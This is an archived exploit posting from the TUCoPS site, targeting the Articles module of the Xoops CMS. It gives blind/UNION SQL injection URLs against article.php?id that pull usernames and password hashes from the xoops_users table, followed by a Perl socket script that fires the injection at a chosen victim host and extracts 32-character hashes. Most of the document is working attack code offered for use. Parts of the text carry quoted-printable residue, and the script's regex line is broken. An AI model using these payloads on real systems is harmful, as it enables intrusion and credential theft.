TUCoPS :: Web :: CMS / Portals :: bx2892.htm

Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it
Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it
Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it


/Cr@zy_King / http://coderx.org=0D 
=0D
Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it=0D
=0D
Sql 1-2=0D
=0D
article.php?id=3+union+select+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),8,9,0,1,2,3,4,5,6,7,8,9,0/*=0D
=0D
article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*=0D
=0D
# Exploit :=0D
=0D
#############################################=0D
#Coded By Cr@zy_King http://coderx.org]#=0D 
#############################################=0D
=0D
use IO::Socket;=0D
=0D
if (@ARGV != 3)=0D
{=0D
    print "\n-----------------------------------\n";=0D
    print "Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it\n";=0D
    print "-----------------------------------\n";=0D
    print "\n4ever Cra\n";=0D
    print "crazy_kinq[at]hotmail.co.uk\n";=0D
print "http://coderx.org\n";=0D 
    print "\n-----------------------------------\n";=0D
    print "\nKullanim: $0   \n";=0D
print "Ornek: $0 www.victim.com /path 1\n";=0D 
    print "\n-----------------------------------\n";=0D
    exit ();=0D
}=0D
=0D
$server = $ARGV[0];=0D
$path = $ARGV[1];=0D
$uid = $ARGV[2];=0D
=0D
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",  PeerPort =>=0D
"80");=0D
printf $socket ("GET=0D
%s/modules/articles/article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection:=0D
close\n\n",=0D
$path,$server,$uid);=0D
=0D
while(<$socket>)=0D
=0D
{=0D
    if (/\>(\w{32})\http://coderx.org=0D 
# crazy_kinq@hotmail.co.uk

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH